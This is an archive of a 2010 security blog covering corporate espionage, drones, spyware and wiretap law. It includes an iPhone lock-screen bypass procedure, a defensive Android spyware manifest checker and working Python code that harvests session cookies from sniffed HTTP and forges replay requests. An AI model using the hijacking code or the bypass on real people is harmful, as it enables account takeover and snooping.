Saturday, November 6, 2010

Sprint Excludes Chinese Companies From Contract Over Security Fears

Sprint Nextel is excluding Chinese telecommunications-equipment makers Huawei Technologies and ZTE from a contract worth billions of dollars largely because of national security concerns in Washington. The Defense Department and some U.S. lawmakers have been increasingly concerned about the two companies’ ties to the Chinese government and military, and the security implications of letting their equipment into critical U.S. infrastructure. Some officials argue China’s military could use Huawei or ZTE equipment to disrupt or intercept American communications. (more)

Wednesday, November 3, 2010

Personal Spying - Drones On

Here at Kevin's Security Scrapbook I have been watching the development of drones for years. These are my two personal favorites: Do It Yourself Sky Spies - The Draganflyer and "MAV" The Scariest SiFi Movie You'll See this Year.

If you followed the Scrapbook, you already knew where this is going.  

Time for an official FutureWatch prediction... Private Investigators will start selling off the old TSCM gadgets they bought (and never turned a profit on) to invest in a drone. Although the applications will be limited (by practicality and law), drones will offer solutions to previously unsolvable problems.

Early adopters will easily recoup their investments and turn a profit via rental of the drone for special assignments, and/or selling the photos/video at a premium price. In fact, having a drone should bring in previously unattainable assignments. 

P.S.
This is a window of opportunity. It may take up to ten years for new laws (and FAA regulations) protecting public safety and privacy to catch up.

...via The Wall Street Journal...
Personal drones aren't yet plying U.S. flyways. But an arms race is building among people looking to track celebrities, unfaithful lovers or even wildlife. Some organizations would like them for emergency operations in areas hit by natural disasters. Several efforts to develop personal drones are scheduled for completion in the next year.

"If the Israelis can use them to find terrorists, certainly a husband is going to be able to track a wife who goes out at 11 o'clock at night and follow her," said New York divorce lawyer Raoul Felder. (more)

The AR.Drone, an iPhone-controlled helicopter powered by four separate blades
Can't wait?
Check out what's available now!
A.R. Drone (specs) (video)
AERYON Labs (specs) (video)
And many more

SpyCam Tee Shirt

"Even Mr. Bond has to have an off day when all his fancy duds are at the $1.50 Dry Cleaners and he's down to his last pair of underpants. But just because his suit jackets are gone doesn't mean he can't hide fancy spy gadgets on his person. Before he drags out the t-shirts he wore while canvassing for decade-old political campaigns or his favorite band that broke up when he was in college, he goes for his old standby, the From Tokyo With Love Electronic Spy Camera Shirt.

It's so deliciously obvious. Centered in the artwork on the shirt is the man himself, holding a camera to his face. But not just a picture of a camera. Hidden behind the soft cotton exterior is a fully-functioning spy camera. That's right. Whatever your chest can see, the camera can see. A cable connects the camera to a small black box that fits discreetly in your pocket. Just reach in, press the button, and your shirt will capture the evidence before you." (more)

Tuesday, November 2, 2010

Open Season on Marital Bugging and Tapping in the United States Court of Appeals for the Fifth Circuit

A federal court in Texas has ruled that a husband accused of monitoring his wife's computer through a keystroke logger did not violate federal wiretapping laws.

Larry Bagley was sued in June by his wife Rhea Bagley, who accused him of surreptitiously placing audio recording devices in their house as well as a software keystroke logger. The Bagleys are in the process of divorcing.

The complaint in this civil case says that during the divorce proceedings, the husband revealed the existence of the surveillance tech and acknowledged that the "software recorded screenshots of activity on this computer." The husband replied in court documents that "in all conversations, the defendants' children were present and defendant was able to consent to recordation by way of vicarious consent."

U.S. District Judge Lee Rosenthal ruled on October 18 in favor of the husband, saying that the court was required to follow a Fifth Circuit decision saying that the federal wiretap law known as Title III does not apply to marital relationships.

Here are some excerpts from the court's opinion:
Whether Title III provides a remedy for interspousal wiretapping within the marital home is a question that has divided the federal courts of appeal. The Fourth, Sixth, Eighth, Tenth, and Eleventh Circuits have held that such wiretapping is actionable under Title III. The Second and Fifth Circuits have held that Title III does not apply to interspousal wiretaps. (more)

P.S. The United States Court of Appeals for the Fifth Circuit includes:

Industrial Espionage Case Expands

Silicon Valley is bracing itself for fireworks as a long-running intellectual property and industrial espionage dispute between two of the most powerful names in technology finally reaches court.

Oracle is suing its arch-rival SAP for exploiting what it says were illegal downloads of Oracle software code three years ago, and the case has now dragged in another technology titan, Hewlett-Packard, which hired the former SAP boss Leo Apotheker to be its chief executive a month ago. (more)

“A few weeks ago I accused HP’s new CEO, Leo Apotheker, of overseeing an industrial espionage scheme centring on the repeated theft of massive amounts of Oracle’s software,” Mr Ellison said in a statement released this week. (more)

Book Banning Over Industrial Espionage Fears

Many of Germany's top companies are blocking access to Facebook and other social networking sites over fears of industrial espionage and other security concerns, according to a new report. Business weekly Wirtschaftswoche said that many companies on the Dax-30 blue-chip index saw an unacceptable risk posed by employees using such sites at work. (more) ...not to mention the financial drain of social notworking.

Monday, November 1, 2010

"Crito, we owe a rooster to Asclepius. Please, don't forget to pay the debt."

Greece is having a Patriot Act moment, drafting legislation that would break down privacy laws and significantly increase police power. But their catalyst is debt, not terrorism.

Draft legislation obtained by Kathimerini would create government agencies to regulate tax evasion, entitlement issues and use of public property. Police officers in these departments would have unprecedented power to eavesdrop on suspects' conversations and communications and to disguise their identity in pursuit of a suspect.

This would be a major change for a country known for strict privacy laws, according to Kathimerini. (more) (sing-a-long) (Socratic drink)

Are whack jobs bugging our Hollywood Actors?

Actor Randy Quaid (aka General George S. Merlin, "Bug Buster") and his wife, Evi... were in Canada seeking political asylum over their stated fears they would be "whacked'' if they returned to Hollywood... they fled to Canada to escape the so-called "star whackers" - a cult that is bugging their phones and hacking their computers.

"They're absolute businessmen. It's the mafia; it's organized crime," said Mrs. Quaid... The couple has said this "mafia" is behind eight celebrity deaths, including Heath Ledger's, in the last 5 years. (more) (trailer)

Don't tell Mrs. Quaid. It will just upset her.

John McTiernan, director of the movie “Die Hard,” was sentenced to one year in prison for lying about his association with a private investigator, Anthony Pellicano, to illegally wiretap a movie producer. (more)

Hoist by a Voicemail Petard

Employees at a CBS affiliate in Anchorage left an accidental voicemail for an aide to GOP Senate candidate Joe Miller in which they discussed and laughed about the possibility of reporting on the appearance of sex offenders at a Miller rally. And they chatted about responding with a Twitter alert to “any sort of chaos whatsoever” including the candidate being “punched.”
 
Jerry Bever, general manager for KTVA, said in a statement that a call to Miller spokesman Randy DeSoto to discuss the candidate’s planned appearance on a newscast wasn’t disconnected after the conversation ended. The call took place during a KTVA staff meeting to plan coverage of that evening’s Miller rally in downtown Anchorage. (more)

Sunday, October 31, 2010

Hamas warns against buying cars imported from Israel

The Hamas government in the Gaza Strip is warning local politicians, government officials and faction leaders against buying cars imported from Israel for fear they may contain eavesdropping equipment or even remote-activated bombs planted by Israeli security agencies. (more)

Test your car...
If you own a late model General Motors car with OnStar, try this test. Tune your radio to 770 AM, turn up the volume and tap on the OnStar microphone near the rear view mirror. Do you hear yourself coming through the radio? No? Maybe they only bugged my car. ~Kevin

Google Bans SMS Spy App Tap

A controversial mobile phone application, which helps a cell phone user read the text messages of others secretly, has been removed from sale by Internet search engine Google.
Google said the application, called SMS Secret Replicator, violated its terms.

Once installed on a mobile phone, the Android phone application automatically creates carbon copies of incoming text messages and forwards them to a selected number - prompting fears it could be used by jealous lovers and even work colleagues to snoop on private messages. (more) (video)
Google may have dropped it from their marketplace, but that doesn't mean this $9.99 app is not available elsewhere. (more)
Coming soon, a way you can detect if your phone is infected with spyware. (more)
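The app described above needs only a few manifest-level capabilities to do its job: permission to receive SMS, a broadcast receiver for incoming messages registered at high priority (so it sees the text before the inbox does), and a way to send the copy out (SMS or network). As an added illustration, not code from the app, from Google or from this post, the Python below triages an Android manifest for exactly that combination. Both manifests are constructed for the example, and the package names and thresholds are assumptions; a legitimate messaging app matches the same pattern, so a hit is a lead for further review, not proof of spyware.

```python
"""Heuristic triage of an Android app manifest for SMS-forwarding spyware of
the SMS Secret Replicator kind. Added illustration; both manifests are
constructed, not the real app's."""
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"

# Constructed manifest shaped like a message-forwarding spy app: it asks to
# both receive and send SMS and registers a top-priority receiver for incoming
# messages, which lets it copy (or swallow) a text before the inbox sees it.
SUSPECT_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.replicator">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="System Service">
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed benign manifest for comparison.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.flashlight">
  <uses-permission android:name="android.permission.CAMERA"/>
  <application android:label="Flashlight">
    <activity android:name=".MainActivity"/>
  </application>
</manifest>"""


def sms_spy_indicators(manifest_xml: str) -> dict:
    """Pull the manifest facts that matter for SMS spyware triage."""
    root = ET.fromstring(manifest_xml)
    perms = {e.get(ANDROID + "name") for e in root.iter("uses-permission")}
    intercept_priority = None  # highest priority of any SMS_RECEIVED receiver
    for filt in root.iter("intent-filter"):
        actions = {a.get(ANDROID + "name") for a in filt.iter("action")}
        if SMS_RECEIVED not in actions:
            continue
        prio = int(filt.get(ANDROID + "priority", "0"))
        intercept_priority = prio if intercept_priority is None else max(intercept_priority, prio)
    return {
        "package": root.get("package"),
        "receives_sms": "android.permission.RECEIVE_SMS" in perms,
        "sends_sms": "android.permission.SEND_SMS" in perms,
        "has_network": "android.permission.INTERNET" in perms,
        "intercept_priority": intercept_priority,
    }


def is_sms_forwarder_suspect(manifest_xml: str) -> bool:
    """True when an app both intercepts incoming SMS and can send SMS or reach
    the network, i.e. has everything needed to forward copies elsewhere. A real
    messaging app matches too, so treat a hit as a lead, not a verdict."""
    ind = sms_spy_indicators(manifest_xml)
    return (ind["receives_sms"] and ind["intercept_priority"] is not None
            and (ind["sends_sms"] or ind["has_network"]))


if __name__ == "__main__":
    for m in (SUSPECT_MANIFEST, BENIGN_MANIFEST):
        ind = sms_spy_indicators(m)
        print(ind["package"], "suspect" if is_sms_forwarder_suspect(m) else "clean", ind)
```

On a real handset the manifest comes out of the APK (for example via apktool), and the priority value is the tell: an ordinary app has no reason to outrank the stock messaging client for SMS_RECEIVED.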

Thursday, October 28, 2010

Security Alert: iCracked

A security flaw in the iPhone (iOS 4.1) allows strangers to bypass the handset’s lock screen with a few button presses.

...the quick method to circumvent an iPhone’s passcode-protected lock screen:
• tap the “Emergency Call” button,
• then enter three pound signs,
• hit the green Call button
• and immediately press the Lock button.
That simple procedure gives a snoop full access to the Phone app on the iPhone, which contains the address book, voicemail and call history. (more)

Apple:
“We’re aware of this issue and we will deliver a fix to customers as part of the iOS 4.2 software update in November." 

"Why is this important?”
Not having password protection on a smart phone leaves you open to information theft, jail-breaking and injection of spyware.

"Why does this trick exist?"
• It is a software loophole.
• It is a programmer's shortcut they forgot to patch.
• It is a programmer's Easter egg.
• It is a law enforcement backdoor never meant to become public knowledge.
Interesting question. You decide.

FutureWatch: The ability to create passwords longer than four measly digits... which is a pool of only 10,000 passwords. ~Kevin

Wednesday, October 27, 2010

Firesheep Makes Stealing Your Wi-Fi Secrets Easy

via Steven J. Vaughan-Nichols
From all the yammering, you’d actually think there was something new about Firesheep, the Firefox extension that lets you grab login IDs, passwords, and other important information. What a joke. I, and any hacker or network administrator worth his salt, have been able to do this kind of stuff for years.

The only thing “new” about Firesheep is how easy it makes it to do. I’m unimpressed. Anyone who was serious about grabbing your personal information has already been doing it for years. Trust me, if someone really wanted your data and you’ve been using open Wi-Fi networks, they already grabbed it.

No, the real worry isn’t about some jerk grabbing your Twitter password in a coffee house. The real worry has always been that your office Wi-Fi is easy to compromise and then someone can use a packet-sniffer to get something that really matters like your Accounts Payable password. (more)

Need a Wi-Fi Security Audit and Compliance Inspection? (you do) Please call me. (more)

11/4/10 - UPDATE:  IBM researchers are proposing an approach to WiFi security they call Secure Open Wireless in light of the release of the Firesheep tool. (more)

11/5/10 - UPDATE: 10 Ways to Protect Yourself from Firesheep Attacks (more)
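What Firesheep automated is worth seeing in code, because it also shows why the fix is on the server as much as on the Wi-Fi. As an added illustration (not Firesheep's source, not from Vaughan-Nichols' column and not from this post), the Python below parses plaintext HTTP requests as a sniffer on an open network sees them, pulls out the cookies that carry the logged-in session, and builds the replay request that rides that session. The last function is the defender's side: any session cookie set without the Secure attribute will be sent by the browser over plain http://, which is the exposure that makes the attack work. The hostnames, cookie names and values are constructed for the example, and the list of session-cookie names is an assumption standing in for Firesheep's per-site handlers.

```python
"""Firesheep-style session-cookie harvesting from plaintext HTTP, and the
Set-Cookie check that defeats it. Added illustration for this post; the
captured traffic and every hostname/cookie below are constructed."""
from http.cookies import SimpleCookie

# Constructed: three plaintext HTTP requests as a sniffer on an open Wi-Fi
# network would see them (hostnames and cookie values are invented).
CAPTURED_REQUESTS = [
    b"GET /home HTTP/1.1\r\nHost: social.example\r\n"
    b"Cookie: sid=9f3a2c; lang=en\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    b"GET /inbox HTTP/1.1\r\nHost: mail.example\r\n"
    b"Cookie: auth=t0k3n; theme=dark\r\n\r\n",
    b"GET /img/logo.png HTTP/1.1\r\nHost: cdn.example\r\n\r\n",  # no cookie
]

# Cookie names to treat as session identifiers; an assumption standing in for
# Firesheep's per-site handlers, which knew each site's cookie by name.
SESSION_COOKIE_NAMES = {"sid", "auth", "session", "PHPSESSID", "JSESSIONID"}


def parse_request(raw: bytes) -> dict:
    """Split an HTTP/1.1 request head into its request line and a
    lowercased header map."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"request_line": lines[0], "headers": headers}


def harvest_sessions(packets) -> dict:
    """Return {host: {cookie_name: value}} for cookies that look like session
    identifiers. A plaintext Cookie header is all an attacker needs, because
    the server accepts the cookie from any client that presents it."""
    found = {}
    for raw in packets:
        req = parse_request(raw)
        host = req["headers"].get("host")
        cookie_hdr = req["headers"].get("cookie")
        if not host or not cookie_hdr:
            continue
        jar = SimpleCookie()
        jar.load(cookie_hdr)
        sessions = {name: m.value for name, m in jar.items()
                    if name in SESSION_COOKIE_NAMES}
        if sessions:
            found.setdefault(host, {}).update(sessions)
    return found


def forge_request(host: str, path: str, cookies: dict) -> bytes:
    """Build the request an attacker would send to ride the stolen session."""
    cookie_hdr = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_hdr}\r\n\r\n").encode()


def insecure_set_cookies(response_headers) -> list:
    """Names of cookies a server sets without the Secure attribute. Without it
    the browser also sends the cookie on plain http:// requests, which is
    exactly the exposure harvest_sessions() exploits."""
    exposed = []
    for line in response_headers:
        name, _, value = line.partition(":")
        if name.strip().lower() != "set-cookie":
            continue
        jar = SimpleCookie()
        jar.load(value.strip())
        for cookie_name, morsel in jar.items():
            if not morsel["secure"]:
                exposed.append(cookie_name)
    return exposed


if __name__ == "__main__":
    stolen = harvest_sessions(CAPTURED_REQUESTS)
    print(stolen)
    print(forge_request("social.example", "/home", stolen["social.example"]))
    print(insecure_set_cookies([
        "Set-Cookie: sid=9f3a2c; Path=/; HttpOnly",
        "Set-Cookie: auth=t0k3n; Path=/; Secure; HttpOnly",
    ]))
```

Note that HttpOnly does nothing against this attack: it stops scripts from reading the cookie, not the network. The cookie has to be marked Secure and the site has to serve the logged-in session over HTTPS throughout, which is the point of the "Secure Open Wireless" and protection write-ups linked in the updates above.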

Our Spy Coin Receives the Ultimate Compliment

I give spy coins to my clients.
It is a reminder that information loss is mostly a people problem, not an electronic problem. Filing cabinets of information can walk out the door in pocket change!


Careless people often blab information, forget to secure it, toss it in the garbage can, or otherwise lose it—hundreds of laptops are lost every day. People also steal it when they become greedy, spiteful, conned, blackmailed, or caught up in a “cause.”

Investigating an information loss, however, begins with an electronic surveillance detection audit.

Here’s why...
• Serious espionage will include electronic surveillance.
• The possibility must be resolved before accusing people.
• Bugging is the easiest spy technique to discover.
• Electronic surveillance evidence helps prove your case.

Best advice...
Conduct audits on a regular basis. Uncover signs of espionage during the intelligence collection stage, before your information can be abused. (more)

A client reports back...
"I think of all of the trinket type things we’ve accumulated over the years, the spy coin is *by far* the coolest, and is made even cooler with the background story provided on the chip!!

I took mine with me to the FBI building today and had the guards there X-ray it alongside a normal quarter to see if its secret contents could be seen on an “airport quality” X-ray machine. They printed out a copy of the scan image, I’ve attached it to this email for your amusement as well.

Several agents commented on how well it was made, and how hard it would be to detect such a thing."